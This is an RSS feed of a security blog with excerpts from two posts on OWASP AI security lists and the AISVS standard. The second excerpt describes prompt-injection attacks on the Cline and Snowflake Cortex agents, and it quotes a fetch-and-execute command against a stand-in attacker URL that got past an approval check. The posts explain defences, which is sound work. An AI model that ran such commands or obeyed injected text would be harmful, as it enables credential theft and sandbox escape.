<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Agentic-Ai on Napat&#39;s Inverse Blog</title>
    <link>/tags/agentic-ai/</link>
    <description>Recent content in Agentic-Ai on Napat&#39;s Inverse Blog</description>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Thu, 02 Apr 2026 15:30:00 +0700</lastBuildDate>
    <atom:link href="/tags/agentic-ai/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Five OWASP AI Lists, One Practitioner Problem</title>
      <link>/2026-04-02-five-owasp-ai-lists-one-practitioner-problem/</link>
      <pubDate>Thu, 02 Apr 2026 15:30:00 +0700</pubDate>
      <guid>/2026-04-02-five-owasp-ai-lists-one-practitioner-problem/</guid>
      <description>&lt;p&gt;I was in a meeting recently where someone asked a simple question: &amp;ldquo;Which OWASP list should we use for our AI security review?&amp;rdquo;&lt;/p&gt;
&lt;p&gt;Nobody could answer it. Not because the people in the room were incompetent. The opposite, actually — they&amp;rsquo;d all read the lists, which is precisely why they couldn&amp;rsquo;t answer. There are five of them now. Five OWASP AI security lists. Each one a Top 10, except the one that&amp;rsquo;s a 200-page guide. They overlap, contradict, and occasionally talk past each other. When someone finally pulled up Matt Adams&amp;rsquo; &lt;a href=&#34;https://owaspai.matt-adams.co.uk/&#34;&gt;OWASP AI Top 10 Comparator&lt;/a&gt; — a tool that exists specifically because the proliferation problem is bad enough to need its own website — the room collectively sighed.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The First Real Standard for AI Security: What OWASP AISVS Gets Right, What It Misses, and What You Should Actually Do</title>
      <link>/2026-04-01-the-first-real-standard-for-ai-security-what-owasp-aisvs-gets-right-what-it-misses-and-what-you-should-actually-do/</link>
      <pubDate>Wed, 01 Apr 2026 21:26:00 +0700</pubDate>
      <guid>/2026-04-01-the-first-real-standard-for-ai-security-what-owasp-aisvs-gets-right-what-it-misses-and-what-you-should-actually-do/</guid>
      <description>&lt;p&gt;We spent twenty years getting web security to a place where it was boring. Boring was good. Boring meant it mostly worked. You&amp;rsquo;d run your OWASP Top 10 scanner, fix the SQL injection and XSS findings, check the boxes on the ASVS, and ship. Not glamorous. But it worked.&lt;/p&gt;
&lt;p&gt;Then someone figured out you could steal a whole system&amp;rsquo;s secrets by asking it nicely.&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s not a metaphor. In February 2026, security researcher Adnan Khan showed that you could compromise Cline&amp;rsquo;s production releases — an AI coding tool used by millions of developers — by opening a GitHub issue with a carefully crafted title. The issue title contained a prompt injection payload that tricked Claude into running &lt;code&gt;npm install&lt;/code&gt; on a malicious package, which then poisoned the GitHub Actions cache and pivoted to steal the credentials that publish Cline&amp;rsquo;s VS Code extension. An issue title. Not a zero-day exploit, not a nation-state attack chain. Words in a text field.&lt;/p&gt;
&lt;p&gt;This is the fundamental problem with AI security, and it&amp;rsquo;s the reason OWASP wrote the AI Security Verification Standard (AISVS). Traditional AppSec assumes deterministic programs: the code does what you wrote. Maybe what you wrote was wrong — a SQL injection, a buffer overflow — but the code executes faithfully. Fix the bug, it stays fixed. AI systems are probabilistic. The model doesn&amp;rsquo;t execute instructions; it generates plausible continuations. You can have perfect code, proper input validation, encrypted storage — and still get owned because someone hid instructions in a README file that the model decided to follow instead of yours.&lt;/p&gt;
&lt;p&gt;Here&amp;rsquo;s the uncomfortable truth: many teams deploying AI today use API-based models they don&amp;rsquo;t control. They can&amp;rsquo;t inspect training data or run adversarial evaluations against someone else&amp;rsquo;s model. AISVS describes a comprehensive posture; most teams consuming foundation models through APIs control maybe 10% of it. I&amp;rsquo;ll come back to this.&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id=&#34;the-three-chapters-that-matter-most&#34;&gt;The Three Chapters That Matter Most&lt;/h2&gt;
&lt;p&gt;AISVS spans 14 chapters covering everything from training data provenance to human oversight. Rather than walking through all of them — you can read the spec yourself — I want to focus on the three that should be on every security engineer&amp;rsquo;s radar right now.&lt;/p&gt;
&lt;h3 id=&#34;c2-user-input-validation--the-prompt-injection-chapter&#34;&gt;C2: User Input Validation — The Prompt Injection Chapter&lt;/h3&gt;
&lt;p&gt;This is the chapter you implement first. Prompt injection is the SQL injection of AI systems: well-understood, frequently demonstrated, and still not consistently defended against. The Snowflake Cortex AI sandbox escape in March 2026 demonstrated this clearly. PromptArmor found that an indirect prompt injection hidden in a GitHub repository&amp;rsquo;s README could manipulate Snowflake&amp;rsquo;s Cortex Agent into executing &lt;code&gt;cat &amp;lt; &amp;lt;(sh &amp;lt; &amp;lt;(wget -q0- https://ATTACKER_URL.com/bugbot))&lt;/code&gt; — bypassing the human-in-the-loop approval system because the command validation didn&amp;rsquo;t inspect code inside process substitution expressions. The agent then set a flag to execute outside the sandbox, downloaded malware, and used cached Snowflake tokens to exfiltrate data and drop tables. Two days after release. Fixed, but instructive.&lt;/p&gt;
&lt;p&gt;AISVS C2 decomposes prompt injection defense into specific, testable controls. Requirement 2.1.1 mandates that all external inputs be treated as untrusted and screened by a prompt injection detection ruleset or classifier. Requirement 2.1.2 requires instruction hierarchy enforcement — system and developer messages must override user instructions across multi-step interactions. This is directly relevant to attacks like Clinejection, where the injected payload rode in through an issue title that was interpolated into the prompt without sanitization.&lt;/p&gt;
&lt;p&gt;The chapter also addresses subtler vectors. Requirement 2.2.1 mandates Unicode normalization before tokenization — homoglyph swaps and invisible control characters are a real bypass technique against naive input filters. Section 2.7 covers multi-modal validation: text extracted from images and audio must be treated as untrusted per 2.1.1, and files must be scanned for steganographic payloads before ingestion.&lt;/p&gt;
&lt;p&gt;For practitioners: start with 2.1.1 (prompt injection screening), 2.1.2 (instruction hierarchy), 2.4.1 (explicit input schemas), and 2.7.2 (treat extracted text as untrusted). That&amp;rsquo;s your Level 1 baseline.&lt;/p&gt;
&lt;h3 id=&#34;c9-autonomous-orchestration--the-agentic-risk-chapter&#34;&gt;C9: Autonomous Orchestration — The Agentic Risk Chapter&lt;/h3&gt;</description>
    </item>
  </channel>
</rss>
